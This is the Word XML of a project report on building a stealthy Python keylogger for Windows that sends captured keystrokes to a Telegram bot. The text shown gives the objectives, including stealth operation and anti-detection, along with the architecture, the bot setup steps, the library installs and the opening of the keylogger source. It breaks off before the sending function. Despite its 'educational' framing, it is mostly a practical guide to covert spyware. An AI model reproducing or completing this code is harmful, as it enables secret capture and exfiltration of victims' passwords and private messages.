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6FE8" w14:textId="594BFE5F" w:rsidR="00A92A0C" w:rsidRDefault="00A14ACD" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">Report on </w:t>
      </w:r>
      <w:r w:rsidR="00A92A0C">
        <w:t>Advanced Keylogger with Telegram Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E40B45" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="0F9136CD" w14:textId="05A3E348" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F01D0E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">1. Introduction  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26977FF9" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">2. Objectives  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D153DCA" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">3. Project Scope  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0290D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">4. System Architecture  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263BA2D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">5. Tools and Technologies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA441D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">6. Implementation Details  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443D85E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   - 6.1 Creating a Telegram Bot  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D03ABB" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   - 6.2 Setting Up Python Environment  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0469F4B3" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   - 6.3 Writing the Keylogger Script  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD258E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">   - 6.4 Integrating Telegram API  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6B113" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">7. Execution Steps  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3DC60" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">8. Error Handling and Solutions  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095A2ABE" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">9. Security and Ethical Considerations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632662A9" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">10. Testing and Results  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A3CA9B" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">11. Limitations  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A074A5" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">12. Future Enhancements  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7E410" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">13. Conclusion  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5190D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">14. References  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFEB607" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="629A0E20" w14:textId="2E2EC6AF" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="494A59B7" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="49A6654A" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="05EADC51" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="50926C2D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="4B3E3E0E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="73E0CEBA" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="30E5F0F8" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="4B1CBB77" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="285095E7" w14:textId="34A86308" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. Introduction  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693984F" w14:textId="49B7D96C" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">A keylogger is a software program that records keyboard inputs. This project implements an advanced Python-based keylogger with features such as real-time keystroke logging, Telegram-based remote notifications, and log storage. The integration with Telegram API allows logs to be sent securely to a private chat, enabling remote monitoring.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5746DCEC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="54963BD9" w14:textId="3E5E70D2" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="2282E62D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="12C506DF" w14:textId="4999F47F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">2. Objectives  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5472B" w14:textId="32F7998D" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Develop a Python-based keylogger capable of capturing keystrokes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA81243" w14:textId="75E38B90" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Store logs locally and remotely using Telegram.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D185C9" w14:textId="5AB3237D" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Ensure stealth mode operation for background execution.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510623CB" w14:textId="3DA8FCB4" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Implement basic anti-detection techniques.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7398104A" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Address ethical and security considerations.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5D627" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="79E565F7" w14:textId="1F1AF2B5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="70859FBA" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="514D8B18" w14:textId="5C9FF7C7" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">3. Project Scope  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE008C" w14:textId="6CAF2245" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- The keylogger operates on Windows OS.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7B2C2" w14:textId="65B91C9C" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- It captures all keystrokes, including special characters.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61218348" w14:textId="46300702" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Sends logs to a Telegram bot in real time.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB653F2" w14:textId="2D792D52" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Stores logs locally in encrypted format.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF4F3E" w14:textId="6BD31E49" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Designed for educational and ethical penetration testing purposes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FDFAD" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="6744EE1A" w14:textId="5F69FDC5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="5A6F37C1" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="77BADEEC" w14:textId="32EDE1FC" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">4. System Architecture  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706EE95" w14:textId="78CF4F3B" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">The keylogger follows a client-server architecture where:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBA4DE" w14:textId="08AEE59F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Client → Captures keystrokes and sends logs.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0B137" w14:textId="0E6870A6" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">- Server (Telegram API) → Receives logs and displays them in a Telegram chat.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB5948" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1B2CF1E1" w14:textId="1ECB4308" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="26480C99" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="3518047A" w14:textId="39A70B29" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">5. Tools and Technologies* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75708D51" w14:textId="5E0C56F5" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>| Tool/Technology |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Purpose </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                      </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA43D3" w14:textId="339BA5E1" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|--------------------</w:t>
      </w:r>
      <w:r>
        <w:t>---</w:t>
      </w:r>
      <w:r>
        <w:t>|------------</w:t>
      </w:r>
      <w:r>
        <w:t>------------------------------------------</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38E8F8" w14:textId="7F3BCFC7" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python 3.x </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>| Core programming language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E3A8D" w14:textId="512232B6" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Captures keystrokes </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128FF7F" w14:textId="0570BD7E" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | Sends logs to Telegram API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDEA7E4" w14:textId="2D10F9F7" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> threading </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>| Runs keylogger in the background</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DBC04E" w14:textId="45A5D1DC" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | Converts script into an executable (.exe)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D2815" w14:textId="4D2CAF68" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telegram </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Remote log delivery </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">|  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA78CDC" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="09D3CEF5" w14:textId="0FA00DC6" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1DB74A5F" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="1BACEF49" w14:textId="3CCE4093" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>6. Implementation Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54649604" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="31DBF0C5" w14:textId="2912B793" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">6.1 Creating a Telegram Bot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB07CD2" w14:textId="3C289CE3" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">1. Open Telegram and search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BotFather</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B17A86" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>2. Start a chat and type /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newbot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B658A5" w14:textId="7ACE115F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">3. Follow the prompts to create a bot and get the BOT_TOKEN.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B739658" w14:textId="0C24585F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">4. Use curl or Postman to get your Chat ID.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5B9718" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="00C04791" w14:textId="74569C49" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">6.2 Setting Up Python Environment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8642F7" w14:textId="578E3393" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">Install required Python libraries:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3EDE7" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A72C9" w14:textId="3A2FD1BE" w:rsidR="00A92A0C" w:rsidRDefault="00E46F29" w:rsidP="00A92A0C">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A92A0C">
        <w:t xml:space="preserve">pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A92A0C">
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A92A0C">
        <w:t xml:space="preserve"> requests </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A92A0C">
        <w:t>pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D6267E0" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="7337FAED" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="570CE9E4" w14:textId="77777777" w:rsidR="00691610" w:rsidRDefault="00691610" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="326D2395" w14:textId="77777777" w:rsidR="00691610" w:rsidRDefault="00691610" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="7404343C" w14:textId="77777777" w:rsidR="00691610" w:rsidRDefault="00691610" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="2F4D1B57" w14:textId="77777777" w:rsidR="00691610" w:rsidRDefault="00691610" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="45A24E5C" w14:textId="3D20BB7F" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.3 Writing the Keylogger Script  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA4E76D" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">The keylogger captures keystrokes and stores them in a local file before sending logs to Telegram.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F2FCB" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="53E94780" w14:textId="22695B52" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768E1A7" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA58993" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pynput.keyboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629BB84C" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA2B08" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A518934" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65096BAD" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="3574B93E" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t># Telegram Bot Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F360DB" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>BOT_TOKEN = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your_bot_token_here</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D78986" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t>CHAT_ID = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>your_chat_id_here</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3BCF6" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="0334F6B2" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t># Store logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8CF86" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "keylog.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E1EBF" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C"/>
    <w:p w14:paraId="4A9E78C7" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t># Function to send logs to Telegram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C39A4" w14:textId="77777777" w:rsidR="00A92A0C" w:rsidRDefault="00A92A0C" w:rsidP="00A92A0C">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
